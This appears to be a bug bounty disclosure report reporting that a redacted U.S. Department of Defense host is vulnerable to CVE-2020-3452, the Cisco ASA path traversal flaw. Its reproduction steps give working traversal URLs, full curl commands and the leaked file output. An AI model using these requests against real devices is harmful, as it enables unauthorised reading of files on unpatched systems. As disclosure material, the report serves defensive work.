Lucene search

TheyH1:940384

HistoryJul 24, 2020 - 5:12 a.m.

U.S. Dept Of Defense: https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

2020-07-2405:12:21

they

hackerone.com

153

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.975 High

EPSS

Percentile

100.0%

JSON

Summary:
https://████████ is vulnerable to a Read-Only Path Traversal Vulnerability

Description:
Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.

Impact

An unauthenticated, remote attacker can read sensitive files located inside the webroot directory.

Step-by-step Reproduction Instructions

Using Browser

Visit https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../ in browser and note that you are prompted for a file download. This will be the source code for portal_inc.lua which is not normally accessible.
To verify you cannot access this file normally, visit https://██████/+CSCOE+/portal_inc.lua and verify that you receive a page that says “Wrong URL”.

Using Curl

In a linux terminal, send the following curl command:

curl -i -s -k -X $'GET' \
    -H $'Host: ████████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    $'https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'

and

curl -i -s -k -X $'GET' \
    -H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    $'https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'

You should receive the following output:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Fri, 24 Jul 2020 04:27:46 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains

-- Copyright (C) 2006-2018 by Cisco Systems, Inc.
-- Created by [email protected]

dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")

local function compare(a,b) return a["order"]&lt;b["order"] end;

function INTERNAL_PASSWORD_ENABLED(name)
        return false;

To verify you should not be able to access this info, run the following curl command:

curl -i -s -k -X $'GET'  \
   -H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1'   \
  $'https://███/%2bCSCOE%2b/portal_inc.lua'

You should receive the following output:

HTTP/1.1 500 Internal Error
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Fri, 24 Jul 2020 04:28:13 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains